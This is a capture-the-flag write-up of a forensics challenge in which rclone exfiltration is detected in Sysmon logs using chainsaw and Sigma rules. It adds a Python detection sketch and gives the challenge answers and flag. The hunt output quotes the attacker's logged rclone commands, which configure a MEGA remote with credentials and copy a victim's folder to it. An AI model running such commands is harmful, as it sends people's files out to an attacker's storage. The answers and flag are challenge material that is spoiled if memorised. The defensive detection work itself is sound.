Packet Cyclone
We have this description for the challenge:
Pandora’s friend and partner, Wade, is the one that leads the investigation into the relic’s location. Recently, he noticed some weird traffic coming from his host. That led him to believe that his host was compromised. After a quick investigation, his fear was confirmed. Pandora tries now to see if the attacker caused the suspicious traffic during the exfiltration phase. Pandora believes that the malicious actor used rclone to exfiltrate Wade’s research to the cloud. Using the tool called “chainsaw” and the sigma rules provided, can you detect the usage of rclone from the event logs produced by Sysmon? To get the flag, you need to start and connect to the docker service and answer all the questions correctly.
And we are given these files:
$ tree
.
├── Logs
│   ├── Application.evtx
│   ├── HardwareEvents.evtx
│   ├── Internet Explorer.evtx
│   ├── Key Management Service.evtx
│   ├── Microsoft-Client-Licensing-Platform%4Admin.evtx
│   ├── Microsoft-Windows-AAD%4Operational.evtx
│   ├── Microsoft-Windows-AppModel-Runtime%4Admin.evtx
│   ├── Microsoft-Windows-AppReadiness%4Admin.evtx
│   ├── Microsoft-Windows-AppReadiness%4Operational.evtx
│   ├── Microsoft-Windows-AppXDeployment%4Operational.evtx
│   ├── Microsoft-Windows-AppXDeploymentServer%4Operational.evtx
│   ├── Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx
│   ├── Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx
│   ├── Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx
│   ├── Microsoft-Windows-Application-Experience%4Program-Inventory.evtx
│   ├── Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx
│   ├── Microsoft-Windows-Application-Experience%4Steps-Recorder.evtx
│   ├── Microsoft-Windows-AppxPackaging%4Operational.evtx
│   ├── Microsoft-Windows-Audio%4CaptureMonitor.evtx
│   ├── Microsoft-Windows-Audio%4Operational.evtx
│   ├── Microsoft-Windows-Audio%4PlaybackManager.evtx
│   ├── Microsoft-Windows-Authentication User Interface%4Operational.evtx
│   ├── Microsoft-Windows-Biometrics%4Operational.evtx
│   ├── Microsoft-Windows-BitLocker%4BitLocker Management.evtx
│   ├── Microsoft-Windows-Bits-Client%4Operational.evtx
│   ├── Microsoft-Windows-CloudStore%4Operational.evtx
│   ├── Microsoft-Windows-CodeIntegrity%4Operational.evtx
│   ├── Microsoft-Windows-Containers-BindFlt%4Operational.evtx
│   ├── Microsoft-Windows-Containers-Wcifs%4Operational.evtx
│   ├── Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx
│   ├── Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx
│   ├── Microsoft-Windows-Crypto-DPAPI%4Operational.evtx
│   ├── Microsoft-Windows-Crypto-NCrypt%4Operational.evtx
│   ├── Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx
│   ├── Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Operational.evtx
│   ├── Microsoft-Windows-DeviceSetupManager%4Admin.evtx
│   ├── Microsoft-Windows-DeviceSetupManager%4Operational.evtx
│   ├── Microsoft-Windows-Dhcp-Client%4Admin.evtx
│   ├── Microsoft-Windows-Dhcpv6-Client%4Admin.evtx
│   ├── Microsoft-Windows-Diagnosis-DPS%4Operational.evtx
│   ├── Microsoft-Windows-Diagnosis-PLA%4Operational.evtx
│   ├── Microsoft-Windows-Diagnosis-Scripted%4Admin.evtx
│   ├── Microsoft-Windows-Diagnosis-Scripted%4Operational.evtx
│   ├── Microsoft-Windows-Diagnosis-Scheduled%4Operational.evtx
│   ├── Microsoft-Windows-Diagnostics-Performance%4Operational.evtx
│   ├── Microsoft-Windows-DiskDiagnosticDataCollector%4Operational.evtx
│   ├── Microsoft-Windows-FileHistory-Core%4WHC.evtx
│   ├── Microsoft-Windows-GroupPolicy%4Operational.evtx
│   ├── Microsoft-Windows-HelloForBusiness%4Operational.evtx
│   ├── Microsoft-Windows-HotspotAuth%4Operational.evtx
│   ├── Microsoft-Windows-IKE%4Operational.evtx
│   ├── Microsoft-Windows-Kernel-Boot%4Operational.evtx
│   ├── Microsoft-Windows-Kernel-EventTracing%4Admin.evtx
│   ├── Microsoft-Windows-Kernel-PnP%4Configuration.evtx
│   ├── Microsoft-Windows-Kernel-PnP%4Driver Watchdog.evtx
│   ├── Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx
│   ├── Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx
│   ├── Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx
│   ├── Microsoft-Windows-Kernel-WHEA%4Errors.evtx
│   ├── Microsoft-Windows-Kernel-WHEA%4Operational.evtx
│   ├── Microsoft-Windows-Known Folders API Service.evtx
│   ├── Microsoft-Windows-LanguagePackSetup%4Operational.evtx
│   ├── Microsoft-Windows-LiveId%4Operational.evtx
│   ├── Microsoft-Windows-MUI%4Admin.evtx
│   ├── Microsoft-Windows-MUI%4Operational.evtx
│   ├── Microsoft-Windows-ModernDeployment-Diagnostics-Provider%4Admin.evtx
│   ├── Microsoft-Windows-ModernDeployment-Diagnostics-Provider%4Autopilot.evtx
│   ├── Microsoft-Windows-ModernDeployment-Diagnostics-Provider%4ManagementService.evtx
│   ├── Microsoft-Windows-NCSI%4Operational.evtx
│   ├── Microsoft-Windows-NetworkProfile%4Operational.evtx
│   ├── Microsoft-Windows-Ntfs%4Operational.evtx
│   ├── Microsoft-Windows-Ntfs%4WHC.evtx
│   ├── Microsoft-Windows-Partition%4Diagnostic.evtx
│   ├── Microsoft-Windows-PowerShell%4Admin.evtx
│   ├── Microsoft-Windows-PowerShell%4Operational.evtx
│   ├── Microsoft-Windows-Privacy-Auditing%4Operational.evtx
│   ├── Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx
│   ├── Microsoft-Windows-Provisioning-Diagnostics-Provider%4Admin.evtx
│   ├── Microsoft-Windows-Provisioning-Diagnostics-Provider%4AutoPilot.evtx
│   ├── Microsoft-Windows-Provisioning-Diagnostics-Provider%4ManagementService.evtx
│   ├── Microsoft-Windows-PushNotification-Platform%4Admin.evtx
│   ├── Microsoft-Windows-PushNotification-Platform%4Operational.evtx
│   ├── Microsoft-Windows-ReadyBoost%4Operational.evtx
│   ├── Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx
│   ├── Microsoft-Windows-RestartManager%4Operational.evtx
│   ├── Microsoft-Windows-SMBClient%4Operational.evtx
│   ├── Microsoft-Windows-SMBServer%4Audit.evtx
│   ├── Microsoft-Windows-SMBServer%4Connectivity.evtx
│   ├── Microsoft-Windows-SMBServer%4Operational.evtx
│   ├── Microsoft-Windows-SMBServer%4Security.evtx
│   ├── Microsoft-Windows-Security-Mitigations%4KernelMode.evtx
│   ├── Microsoft-Windows-Security-Mitigations%4UserMode.evtx
│   ├── Microsoft-Windows-Security-SPP-UX-Notifications%4ActionCenter.evtx
│   ├── Microsoft-Windows-SettingSync%4Debug.evtx
│   ├── Microsoft-Windows-SettingSync%4Operational.evtx
│   ├── Microsoft-Windows-Shell-ConnectedAccountState%4ActionCenter.evtx
│   ├── Microsoft-Windows-Shell-Core%4ActionCenter.evtx
│   ├── Microsoft-Windows-Shell-Core%4AppDefaults.evtx
│   ├── Microsoft-Windows-Shell-Core%4LogonTasksChannel.evtx
│   ├── Microsoft-Windows-Shell-Core%4Operational.evtx
│   ├── Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx
│   ├── Microsoft-Windows-SmbClient%4Audit.evtx
│   ├── Microsoft-Windows-SmbClient%4Connectivity.evtx
│   ├── Microsoft-Windows-SmbClient%4Security.evtx
│   ├── Microsoft-Windows-StateRepository%4Operational.evtx
│   ├── Microsoft-Windows-StateRepository%4Restricted.evtx
│   ├── Microsoft-Windows-Storage-Storport%4Health.evtx
│   ├── Microsoft-Windows-Storage-Storport%4Operational.evtx
│   ├── Microsoft-Windows-StorageSpaces-Driver%4Diagnostic.evtx
│   ├── Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx
│   ├── Microsoft-Windows-StorageSpaces-ManagementAgent%4WHC.evtx
│   ├── Microsoft-Windows-Store%4Operational.evtx
│   ├── Microsoft-Windows-Storsvc%4Diagnostic.evtx
│   ├── Microsoft-Windows-Sysmon%4Operational.evtx
│   ├── Microsoft-Windows-TWinUI%4Operational.evtx
│   ├── Microsoft-Windows-TZSync%4Operational.evtx
│   ├── Microsoft-Windows-TaskScheduler%4Maintenance.evtx
│   ├── Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx
│   ├── Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx
│   ├── Microsoft-Windows-Time-Service%4Operational.evtx
│   ├── Microsoft-Windows-UAC%4Operational.evtx
│   ├── Microsoft-Windows-UniversalTelemetryClient%4Operational.evtx
│   ├── Microsoft-Windows-User Device Registration%4Admin.evtx
│   ├── Microsoft-Windows-User Profile Service%4Operational.evtx
│   ├── Microsoft-Windows-UserPnp%4ActionCenter.evtx
│   ├── Microsoft-Windows-UserPnp%4DeviceInstall.evtx
│   ├── Microsoft-Windows-VPN%4Operational.evtx
│   ├── Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx
│   ├── Microsoft-Windows-WER-PayloadHealth%4Operational.evtx
│   ├── Microsoft-Windows-WFP%4Operational.evtx
│   ├── Microsoft-Windows-WMI-Activity%4Operational.evtx
│   ├── Microsoft-Windows-Wcmsvc%4Operational.evtx
│   ├── Microsoft-Windows-WebAuthN%4Operational.evtx
│   ├── Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx
│   ├── Microsoft-Windows-WinRM%4Operational.evtx
│   ├── Microsoft-Windows-Windows Defender%4Operational.evtx
│   ├── Microsoft-Windows-Windows Defender%4WHC.evtx
│   ├── Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx
│   ├── Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx
│   ├── Microsoft-Windows-Windows Firewall With Advanced Security%4FirewallDiagnostics.evtx
│   ├── Microsoft-Windows-WindowsBackup%4ActionCenter.evtx
│   ├── Microsoft-Windows-WindowsSystemAssessmentTool%4Operational.evtx
│   ├── Microsoft-Windows-WindowsUpdateClient%4Operational.evtx
│   ├── Microsoft-Windows-Winlogon%4Operational.evtx
│   ├── Microsoft-Windows-WorkFolders%4WHC.evtx
│   ├── Security.evtx
│   ├── Setup.evtx
│   ├── System.evtx
│   └── Windows PowerShell.evtx
└── sigma_rules
    ├── rclone_config_creation.yaml
    └── rclone_execution.yaml
3 directories, 151 files
Understanding the challenge
The challenge is built around Rclone, a command-line tool for managing files on cloud storage. We are given a large set of EVTX files, which are Windows event logs, including the Sysmon operational log. We also get two Sigma rules; Sigma is a generic and open signature format that lets you describe relevant log events in a straightforward, vendor-neutral way.
The challenge description mentions chainsaw. This tool takes Windows EVTX files and Sigma rules and hunts through the events for indicators of compromise (IoC).
Indicators of compromise
Let’s run chainsaw:
$ wget -q https://github.com/WithSecureLabs/chainsaw/releases/download/v2.6.0/chainsaw_x86_64-unknown-linux-gnu.tar.gz
$ tar xvfz chainsaw_x86_64-unknown-linux-gnu.tar.gz
x chainsaw/LICENCE
x chainsaw/README.md
x chainsaw/chainsaw
x chainsaw/mappings/
x chainsaw/mappings/sigma-event-logs-all.yml
x chainsaw/mappings/sigma-mft-logs-all.yml
x chainsaw/mappings/sigma-event-logs-legacy.yml
$ ./chainsaw/chainsaw
Rapidly work with Forensic Artefacts
Usage: chainsaw [OPTIONS] <COMMAND>
Commands:
dump Dump an artefact into a different format
hunt Hunt through artefacts using detection rules for threat detection
lint Lint provided rules to ensure that they load correctly
search Search through forensic artefacts for keywords
analyse Perform various analyses on artifacts
help Print this message or the help of the given subcommand(s)
Options:
--no-banner Hide Chainsaw's banner
--num-threads <NUM_THREADS> Limit the thread number (default: num of CPUs)
-h, --help Print help
-V, --version Print version
Examples:
Hunt with Sigma and Chainsaw Rules:
./chainsaw hunt evtx_attack_samples/ -s sigma/ --mapping mappings/sigma-event-logs-all.yml -r rules/
Hunt with Sigma rules and output in JSON:
./chainsaw hunt evtx_attack_samples/ -s sigma/ --mapping mappings/sigma-event-logs-all.yml --json
Search for the case-insensitive word 'mimikatz':
./chainsaw search mimikatz -i evtx_attack_samples/
Search for Powershell Script Block Events (EventID 4014):
./chainsaw search -t 'Event.System.EventID: =4104' evtx_attack_samples/
$ ./chainsaw/chainsaw hunt --sigma sigma_rules/ --mapping chainsaw/mappings/sigma-event-logs-all.yml Logs/
By Countercept (@FranticTyping, @AlexKornitzer)
[+] Loading detection rules from: sigma_rules/
[+] Loaded 2 detection rules
[+] Loading forensic artefacts from: Logs/ (extensions: .evtx, .evt)
[+] Loaded 149 forensic artefacts (54.3 MB)
[+] Hunting: [========================================] 149/149
[+] Group: Sigma
timestamp: 2023-02-24 15:35:07
detections: Rclone Execution via Command Line or PowerShell
count: 1
Event.System.Provider: Microsoft-Windows-Sysmon
Event ID: 1
Record ID: 76
Computer: DESKTOP-UTDHED2
Event Data:
  CommandLine: '"C:\Users\wade\AppData\Local\Temp\rclone-v1.61.1-windows-amd64\rclone.exe" config create remote mega user majmeret@protonmail.com pass FBMeavdiaFZbWzpMqIVhJCGXZ5XXZI1qsU3EjhoKQw0rEoQqHyI'
  Company: https://rclone.org
  CurrentDirectory: C:\Users\wade\AppData\Local\Temp\rclone-v1.61.1-windows-amd64\
  Description: Rsync for cloud storage
  FileVersion: 1.61.1
  Hashes: SHA256=E94901809FF7CC5168C1E857D4AC9CBB339CA1F6E21DCCE95DFB8E28DF799961
  Image: C:\Users\wade\AppData\Local\Temp\rclone-v1.61.1-windows-amd64\rclone.exe
  IntegrityLevel: Medium
  LogonGuid: 10DA3E43-D892-63F8-4B6D-030000000000
  LogonId: '0x36d4b'
  OriginalFileName: rclone.exe
  ParentCommandLine: '"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
  ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  ParentProcessGuid: 10DA3E43-D8D2-63F8-9B00-000000000900
  ParentProcessId: 5888
  ParentUser: DESKTOP-UTDHED2\wade
  ProcessGuid: 10DA3E43-D92B-63F8-B100-000000000900
  ProcessId: 3820
  Product: Rclone
  RuleName: '-'
  TerminalSessionId: 1
  User: DESKTOP-UTDHED2\wade
  UtcTime: 2023-02-24 15:35:07.336

timestamp: 2023-02-24 15:35:17
detections: Rclone Execution via Command Line or PowerShell
count: 1
Event.System.Provider: Microsoft-Windows-Sysmon
Event ID: 1
Record ID: 78
Computer: DESKTOP-UTDHED2
Event Data:
  CommandLine: '"C:\Users\wade\AppData\Local\Temp\rclone-v1.61.1-windows-amd64\rclone.exe" copy C:\Users\Wade\Desktop\Relic_location\ remote:exfiltration -v'
  Company: https://rclone.org
  CurrentDirectory: C:\Users\wade\AppData\Local\Temp\rclone-v1.61.1-windows-amd64\
  Description: Rsync for cloud storage
  FileVersion: 1.61.1
  Hashes: SHA256=E94901809FF7CC5168C1E857D4AC9CBB339CA1F6E21DCCE95DFB8E28DF799961
  Image: C:\Users\wade\AppData\Local\Temp\rclone-v1.61.1-windows-amd64\rclone.exe
  IntegrityLevel: Medium
  LogonGuid: 10DA3E43-D892-63F8-4B6D-030000000000
  LogonId: '0x36d4b'
  OriginalFileName: rclone.exe
  ParentCommandLine: '"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
  ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  ParentProcessGuid: 10DA3E43-D8D2-63F8-9B00-000000000900
  ParentProcessId: 5888
  ParentUser: DESKTOP-UTDHED2\wade
  ProcessGuid: 10DA3E43-D935-63F8-B200-000000000900
  ProcessId: 5116
  Product: Rclone
  RuleName: '-'
  TerminalSessionId: 1
  User: DESKTOP-UTDHED2\wade
  UtcTime: 2023-02-24 15:35:17.516
[+] 2 Detections found on 2 documents
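Both hits are Sysmon Event ID 1 (process creation) records whose command line gives away what rclone was told to do. The Python below is an added example, not part of the original writeup or of chainsaw: it applies a simplified Sigma-style selection (image name plus command-line keywords, an assumption rather than the contents of rclone_execution.yaml) to constructed Sysmon records copied from the hunt output, then parses the rclone `config create` and `copy` invocations into the fields the challenge asks about.

```python
import shlex

# Constructed Sysmon Event ID 1 (process creation) records, reduced to the
# fields the check needs; values are copied from the chainsaw hunt output.
RCLONE_EXE = r"C:\Users\wade\AppData\Local\Temp\rclone-v1.61.1-windows-amd64\rclone.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 5888, "Image": POWERSHELL,
     "OriginalFileName": "PowerShell.EXE", "CommandLine": '"' + POWERSHELL + '" '},
    {"EventID": 1, "ProcessId": 3820, "Image": RCLONE_EXE, "OriginalFileName": "rclone.exe",
     "CommandLine": '"' + RCLONE_EXE + '" config create remote mega user '
                    "majmeret@protonmail.com pass FBMeavdiaFZbWzpMqIVhJCGXZ5XXZI1qsU3EjhoKQw0rEoQqHyI"},
    {"EventID": 1, "ProcessId": 5116, "Image": RCLONE_EXE, "OriginalFileName": "rclone.exe",
     "CommandLine": '"' + RCLONE_EXE + r'" copy C:\Users\Wade\Desktop\Relic_location\ remote:exfiltration -v'},
]
# Simplified selection (an assumption, not the content of rclone_execution.yaml):
# rclone binary by image or original file name AND one rclone-ish keyword.
KEYWORDS = ("config", "copy", "sync", "move", "lsd", "remote", "mega", "pcloud",
            "ftp", "--no-check-certificate")

def is_rclone_execution(event):
    """Sigma-style selection over one Sysmon process-creation event."""
    binary_hit = (event.get("Image", "").lower().endswith("\\rclone.exe")
                  or event.get("OriginalFileName", "").lower() == "rclone.exe")
    cmd = event.get("CommandLine", "").lower()
    return event.get("EventID") == 1 and binary_hit and any(k in cmd for k in KEYWORDS)

def parse_rclone_cmdline(cmdline):
    """Pull the fields the questions ask about out of an rclone command line."""
    # posix=False keeps Windows backslashes literal and still honours double quotes.
    args = [t.strip('"') for t in shlex.split(cmdline, posix=False)][1:]
    if args[:2] == ["config", "create"]:
        # rclone config create <name> <type> [key value ...]
        opts = dict(zip(args[4::2], args[5::2]))
        return {"action": "config_create", "remote": args[2], "provider": args[3], **opts}
    if args and args[0] in ("copy", "sync", "move"):
        # rclone copy <source> <remote>:<path> [flags]
        positional = [a for a in args[1:] if not a.startswith("-")]
        remote, _, folder = positional[1].partition(":")
        return {"action": args[0], "source": positional[0].rstrip("\\"),
                "remote": remote, "dest_folder": folder}
    return {"action": args[0] if args else ""}

def hunt(events):
    """Return (ProcessId, parsed command line) for every matching event."""
    return [(e["ProcessId"], parse_rclone_cmdline(e["CommandLine"]))
            for e in events if is_rclone_execution(e)]

def answer_questions(events):
    """Map the detections onto the six questions the challenge service asks."""
    answers = {}
    for pid, parsed in hunt(events):
        if parsed["action"] == "config_create":
            answers.update(email=parsed.get("user"), password=parsed.get("pass"),
                           provider=parsed["provider"], config_pid=pid)
        elif parsed["action"] in ("copy", "sync", "move"):
            answers.update(exfil_source=parsed["source"], exfil_dest=parsed["dest_folder"])
    return answers
```

The parent PowerShell process is deliberately included in the sample so the selection has something to reject; on real data the same two-stage check (binary, then command line) is what keeps a rule like this from firing on every process that merely mentions "remote" or "copy".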
Solution
Now we can connect to the remote instance and answer the questions (all the needed information appears in the table above):
$ nc 157.245.38.221 32724
+----------------+-------------------------------------------------------------------------------+
| Title | Description |
+----------------+-------------------------------------------------------------------------------+
| Packet Cyclone | Pandora's friend and partner, Wade, is the one that leads |
| | the investigation into the relic's location. |
| | Recently, he noticed some weird traffic coming from his host. |
| | That led him to believe that his host was compromised. |
| | After a quick investigation, his fear was confirmed. Pandora tries now to see |
| | if the attacker caused the suspicious traffic during the exfiltration phase. |
| | Pandora believes that the malicious actor used rclone |
| | to exfiltrate Wade's research to the cloud. |
| | Using the tool chainsaw and many sigma rules that can be found online, |
| | can you detect the usage of rclone from the event logs produced by Sysmon? |
| | To get the flag, you need to start and connect |
| | to the docker service and answer all the questions correctly. |
+----------------+-------------------------------------------------------------------------------+
What is the email of the attacker used for the exfiltration process? (for example: name@email.com)
> majmeret@protonmail.com
[+] Correct!
What is the password of the attacker used for the exfiltration process? (for example: password123)
> FBMeavdiaFZbWzpMqIVhJCGXZ5XXZI1qsU3EjhoKQw0rEoQqHyI
[+] Correct!
What is the Cloud storage provider used by the attacker? (for example: cloud)
> mega
[+] Correct!
What is the ID of the process used by the attackers to configure their tool? (for example: 1337)
> 3820
[+] Correct!
What is the name of the folder the attacker exfiltrated; provide the full path. (for example: C:\Users\user\folder)
> C:\Users\Wade\Desktop\Relic_location
[+] Correct!
What is the name of the folder the attacker exfiltrated the files to? (for example: exfil_folder)
> exfiltration
[+] Correct!
Flag
And here’s the flag:
[+] Here is the flag: HTB{Rcl0n3_1s_n0t_s0_inn0c3nt_4ft3r_4ll}